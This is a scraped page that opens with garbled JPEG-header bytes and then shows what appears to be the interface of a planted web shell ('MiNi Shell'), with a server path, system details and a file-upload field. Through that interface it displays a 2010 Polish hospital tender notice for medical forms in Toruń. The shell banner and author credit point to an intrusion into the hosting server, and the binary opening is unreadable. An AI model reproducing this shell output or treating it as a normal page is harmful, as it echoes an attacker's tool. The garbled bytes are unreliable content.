JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100409/79991-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa druków i ksiąg medycznych.</b><br>
<b>Numer ogłoszenia: 79991 - 2010; data zamieszczenia: 09.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa druków i ksiąg medycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa druków i ksiąg medycznych:
1. Ankieta,dwustronna, A-4	- 10.000	szt.	
2. Dobowa karta bilansu wodnego, dwustronna, A-4 - 10.000 szt.		
3. Dokumentacja opieki pielęgniarskiej, dwustronny, A-3 - 40.000 szt.	
4. Druk rw ( samokopiujący oryginał + 3 kopie, numerowany) 25kpl/ bloczek, jednostronny,A-5 - 410 Kpl
5. Druk zamówienia posiłku na oddział, jednostronny, A-4 - 5.000 szt.	
6. Faktura vat ( samokopiujący oryginał + 3 kopie ), jednostronny, A-5 - 10 szt.
7. Formularz przetoczenia krwi lub jej składnika, jednostronny, A-4 - 10.000 szt. 
8. Historia choroby pacjenta leczonego w trybie jednodniowym, dwustronna, A-3, 2.000 szt.
9. Historia rozwoju noworodków, dwustronna, A-3 - 2.000 szt.		
10. Historia zdrowia choroby poradni, dwustronna, 2 x A-5 - 30.000 szt.	
11. Indywidualny plan opieki, dwustronny, A-4 - 60.000 szt.		
12. Informacja dla lekarza kierującego / poz ( samokopiujący oryginal 
+ kopia ) bloczek 50kpl, jednostronny, A-5 - 300 Kpl
13. Informacja dla lekarza kierującego / poz ( samokopiujący oryginal 
+ kopia ) bloczek 50kpl, jednostronny, A-4 - 100 Kpl
14. Karta badania cytologicznego, dwustronna, A-5 - 5.000 szt.		
15. Karta badania histopatologicznego, dwustronna, A-5 - 7.000 szt.	
16. Karta badania laboratoryjnego - poziom troponiny I, jednostronna, A-5 - 30.000 szt.
17. Karta badania laboratoryjnego antygen hbs, jednostronna, A-5 - 30.000 szt. 
18. Karta badania laboratoryjnego badanie koagulologiczne, jednostronna, A-6 - 25.000 szt.
19. Karta badania laboratoryjnego badanie moczu analityka ogólna,	jednostronna, A-5 - 50.000 szt.
20. Karta badania popłodu, dwustronna, A-4 - 5.000 szt.		
21. Karta badania przedmiotowego, dwustronna, A-4 - 35.000 szt.		
22. Karta badań laboratoryjnch chemia kliniczna, jednostronna, A-5	 - 120.000 szt.
23. Karta badań laboratoryjnych - dobowy profil glikemii, 	jednostronna, A-5 - 25.000 szt.
24. Karta badań laboratoryjnych - koagulologia, jednostronna, A-5 - 90.000 szt.
25. Karta badań laboratoryjnych - morfologia krwi, jednostronna, A-5 - 75.000 szt.
26. Karta badań laboratoryjnych - uniwersalna, jednostronna, A-5 - 30.000 szt.
27. Karta dokumentacji postępowania przeciwbólowego ( samokopiujący oryginał 
+ kopia ), jednostronna, A-4 - 8.000 Kpl
28. Karta ginekologiczna, dwustronna, A-3 - 5.000 szt.		
29. Karta gorączkowa ogólna, dwustronna, A-4 - 50.000 szt.		
30. Karta indywidualnej opieki pielęgniarskiej, dwustronna, A-4 - 80.000 szt.	
31. Karta indywidualnej opieki pielęgniarskiej w kontynuacji chemioterapii, dwustronna, A-4 - 5.000 szt.
32. Karta informacyjna leczenia w trybie jednodniowym, jednostronna, A-4 - 2.000 szt.
33. Karta informacyjna pacjenta ( samokopiujący oryginał + kopia ), jednostronna, A-4 - 70.000 Kpl
34. Karta intensywnej terapii noworodka, dwustronna, A-4 - 5.000 szt.	
35. Karta kwalifikacyjna do zabiegu operacyjnego w trybie jednodniowym, dwustronna, A-4 - 2.000 szt.
36. Karta obserwacji cukrzycy / dobowy profil glikemii, dwustronna, A-4 - 2.000 szt.
37. Karta obserwacji i pielęgnacji położnicy po cięciu cesarskim, dwustronna, A-4 - 4.000 szt.
38. Karta obserwacji porodu, jednostronna, A-3 - 1.000 szt.		
39. Karta obserwacji stanu zdrowia noworodka, dwustronna, A-4 - 	5.000 szt.
40. Karta obserwacji tętna płodu, dwustronna, A-4 - 3.000 szt.		
41. Karta obserwacji tętna płodu, dwustronna, 	A-5 - 5.000 szt.		
42. Karta obserwacji wkłuć dożylnych, dwustronna, A-4 - 15.000 szt.	
43. Karta położnicza ( < 22hbd), dwustronna, A-4 - 3.000 szt.		
44. Karta położnicza powyżej 22 tyg. Ciąży, dwustronna, 	A-4 - 7.000 szt.	
45. Karta rejestracyjna zakażenia szpitalnego ( oddział ), dwustronna, A-4 - 1.000 szt.
46. Karta rejestracyjna zakażenia szpitalnego ( poradnia ), dwustronna, A-4 - 1.000 szt.
47. Karta ścisłej obserwacji pacjenta, dwustronna, A-4 - 12.000 szt.	
48. Karta ścisłej obserwacji pacjenta, dwustronna, A-5 - 10.000 szt.	
49. Karta udostępnienia dokumentacji medycznej, jednostronna, A-4 - 10.000 szt.
50. Karta zabiegów, jednostronna, A-6 - 1.000 szt.		
51. Karta zapobiegania i leczenia odleżyn, jednostronna, 	A-4 - 5.000 szt.	
52. Karta zgłoszenia nowotworu złośliwego, dwustronna, 	A-5 - 3.000 szt.	
53. Karta zleceń lekarskich, dwustronna, A-4 - 60.000 szt.		
54. Karta znieczulenia ( samokopiujący oryginał + kopia ) 	jednostronna, A-3 - 6.000 Kpl
55. Karta znieczulenia dożylnego ( samokopiujacy oryginał + kopia ), jednostronna, A-4 - 6.000 Kpl
56. Krwotok, jednostronny, A-4 - 5.000 szt.		
57. Książka badań laboratoryjnych 100kart., dwustronna, A-4 - 40 szt.	
58. Książka oddziałowa oddziału noworodków  100kart., dwustronna, 415mm x 295mm - 10 szt.
59. Książka prób zgodności pracownia serologii transfuzjologicznej 100kart., dwustronna, 300mm x 285mm - 20 szt.
60. Książka przychód-rozchód pracownia serologii transfuzjologicznej 100kart., dwustronna, A-4 - 20 szt.
61. Książka transfuzyjna 50str., dwustronna, A-4 - 20 szt.		
62. Księga odmów przyjęć i porad ambulatoryjnych 120kartek, dwustronna, A-4 - 5 szt.
63. Księga bloku operacyjnego 100kart., dwustronna, A-4	 - 100 szt.	
64. Kwitariusz przychodowy ( samokopiujący , numerowany ) książka, jednostronny, A-4 - 50 szt.
65. Kwit depozytowy ( samokopiujący oryginał +  2 kopia ), jednostronny, A-5 - 40.000 Kpl
66. Kwit depozytowy wartościowy ( samokopiujący oryginał +  2 kopie ), jednostronny, A-5 - 5.000 Kpl		
67. Lekarska karta obserwacji, dwustronna, A-4 - 60.000 szt.		
68. Listownik z nadrukiem kolorowym, jednostronny, A-4 - 5.000 szt.	
69. Nota księgowa ( samokopiujący oryginał + 3 kopie ), jednostronna, A-5 - 5 szt.
70. Nota vat korygująca ( samokopiujący oryginał + 3 kopie ), jednostronna, A-5 - 30 szt.
71. Pielęgniarska karta informacyjna / przeniesienie do innego oddziału, dwustronna, A-4 -10.000 szt.
72. Pielęgniarska karta obserwacji noworodka, dwustronna, A-4 - 5.000 szt.	
73. Pisemne zgłoszenie urodzenia noworodka (samokopiujący oryginał + kopia )dwustronny, A-4 - 2.000 Kpl
74. Polecenie księgowania ( samokopiujący oryginał + 3 kopie ), jednostronny, A-5 -50 szt.
75. Polecenie przelewu / wpłata gotówkowa ( samokopiujący oryginał + 3 kopie )jednostronny, A-6 - 30 szt.
76. Prawa pacjenta, dwustronna, A-5 - 10.000 szt.		
77. Protokół operacyjny, jednostronny, A-4 - 30.000 szt.		
78. Protokół pielęgniarki operacyjnej, dwustronny, A-4 - 30.000 szt.	
79. Przebieg porodu A, dwustronny, A-4 - 1.000 szt.		
80. Rozliczenie posiłków na poszczególne diety na oddział, jednostronny, A-4 - 1.000 szt.
81. Rozliczenie zaliczki bloczek 100kartkowy, jednostronny, A-6 - 15 szt.	
82. Skierowanie do poradni specjalistycznej, jednostronny, A-4 - 15.000 szt.	
83. Skierowanie do pracowni rtg / usg, jednostronny, A-5 - 80.000 szt.	
84. Skierowanie do pracowni tomografii komputerowej wszz, dwustronny, A-4 - 6.000 szt.
85. Skierowanie do szpitala, jednostronny, A-5	- 12.000 szt.		
86. Skierowanie do szpitala / informacja dla lekarza kierującego, jednostronny, A-4 - 20.000 szt.
87. Skierowanie na badanie grupy krwi / wynik badania grupy krwi, jednostronny, A-4 - 35.000 szt.
88. Skierowanie na badanie mikrobiologiczne, dwustronny, A-4 -10.000 szt.	
89. Skierowanie na badanie mikrobiologiczne / karta rejestracji czynnika alarmowego, jednostronny, A-4 - 30.000 szt.
90. Skierowanie na krew do pilnej transfuzji, jednostronny, A-5 - 2.000 szt.
91. Skierowanie na mammografię, dwustronny, A-5 - 3.000 szt.
92. Skierowanie na wykonanie próby zgodności / wynik próby zgodności, dwustronny, A-5 - 25.000 szt.
93. Skierowanie na zabiegi fizjoterapeutyczne, dwustronny, A-5 - 3.000 szt.	
94. Skorowidz do księgi głównej, dwustronny, 2/3 A-4 - 10 szt.
95. Spis bielizny ( samokopiujący oryginał + kopia ) 50kpl/ bloczek, jednostronny, 2/3 A-4 - 250 Kpl
96. Szczegółowy wykaz dokumentów historii choroby, jednostronny, A-4 - 15.000 szt.
97. Świadoma zgoda na operację, jednostronny, A-5 - 35.000 szt.		
98. Świadoma zgoda na operację / zabieg w trybie jednodniowym, jednostronny, A-4 - 2.000 szt.
99. Świadoma zgoda na operacyjne rozwiązanie ciąży metodą cesarskiego cięcia,  dwustronny, A-4 - 4.000 szt.
100. Świadoma zgoda na przeprowadzenie diagnostyki zab. ( niezłośliwe zmiany szyjki macicy), dwustronny, A-4 - 2.000 szt.
101. Świadoma zgoda na przeprowadzenie endoskopowego leczenia operacyjnego, dwustronny, A-4 - 5.000 szt.
102. Świadoma zgoda na przeprowadzenie leczenia oper.( nowotwór złośliwy jajnika ), dwustronny, A-4 - 1.000 szt.
103. Świadoma zgoda na przeprowadzenie leczenia oper.( nowotwór złośliwy macicy ), dwustronny, A-4 -1.000 szt.		
104. Świadoma zgoda na przeprowadzenie leczenia oper.( wycięcie macicy drogą brzuszną ), dwustronny, A-4 - 1.000 szt.
105. Świadoma zgoda na przeprowadzenie leczenia oper. mięśniaków macicy 
( laparotomia ), dwustronny, A-4 - 1.000 szt.
106. Świadoma zgoda na przeprowadzenie leczenia oper. nietrzymania moczu 
( taśmy tvt, ivs, tot), dwustronny, A-4 - 1.000 szt.
107. Świadoma zgoda na przeprowadzenie leczenia oper. zaburzeń statyki narządów płciowych, dwustronny, A-4 - 1.000 szt.
108. Świadoma zgoda na przeprowadzenie leczenia operacyjnego, dwustronny, A-4 - 20.000 szt.
109. Świadoma zgoda na przeprowadzenie leczenia operacyjnego guza 
( laparotomia ), dwustronny, A-4 - 1.000 szt.
110. Świadoma zgoda na przeprowadzenie wyłyżeczkowania jamy macicy, dwustronny, A-4 - 3.000 szt.
111. Świadoma zgoda na wykonanie zabiegu, jednostronny, A-4 - 7.000 szt.	
112. Wkładka do historii choroby, dwustronna, A-4 - 80.000 szt.		
113. Wkładka do historii choroby poradni, dwustronna, A-5 - 3.000 szt.	
114. Wniosek o urlop wypoczynkowy, jednostronny, A-6 - 10.000 szt.	
115. Wniosek o zaliczkę bloczek 100kartkowy, dwustronny, A-6 - 15 szt.	
116. Wydano z pracowni serologii (samokopiujący oryginał + kopia ), jednostronny, A-5 - 5.000 Kpl
117. Wynik badania laboratoryjnego / białko ostrej fazy, jednostronny, A-6 - 5.000 szt.
118. Wynik badania laboratoryjnego / morfologia krwi obwodowej, jednostronny, A-6 - 70.000 szt.
119. Zabiegi pielęgnacyjne, dwustronny, A-3 - 5.000 szt.		
120. Zamówienie na składniki krwi dla banku krwi ( samokopiujący oryginał + kopia ), jednostronny, A-5 - 1.000 Kpl
121. Zamówienie na krew i jej składniki, jednostronny, A-6 - 10.000 szt.	
122. Zapotrzebowanie dokonania dostawy/ wykonania usługi, jednostronny , A-4 - 10.000 szt.
123. Zapotrzebowanie na krew i preparatu krwiopochodne, jednostronny, A-5 - 10.000 szt.	
124. Zaświadczenie lekarskie, jednostronny, A-5 - 10.000 szt.		
125. Zaświadczenie lekarskie, jednostronny, A-6 - 10.000 szt.		
126. Zestawienie bielizny przekazanej do prania za okres, jednostronny, A-5 -1.000 szt.	
127. Zestawienie bielizny przekazanej do prania za okres, jednostronny, A-4 - 1.000 szt.
128. Zestawienie dzienne oddziału, dwustronny, A-5 - 10.000 szt.		
129. Zgoda na transport sanitarny, jednostronny, A-5 - 5.000 szt.		
130. Zgoda na zabieg operacyjny, jednostronny, A-4 - 20.000 szt.		
131. Zgoda pacjenta na przetoczenie preparatu krwi, jednostronny, A-4 - 10.000 szt.		
132. Zgoda pacjenta na wykonanie drenażu opłucnej, dwustronny, A-4 - 1.000 szt.
133. Zgoda pacjenta na wykonanie punkcji opłucnej, dwustronny, A-4 - 1.000 szt.
134. Książka raportów pielęgniarskich, dwustronna, A-4 - 200 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 2 dostaw druków i ksiąg medycznych o wartości min. 21.000,00 zł brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty 14.000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/ Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.

Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym oraz aneksowania ceny brutto w przypadku zmiany urzędowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2010 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, 
o których mowa w art. 24 ust. 1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com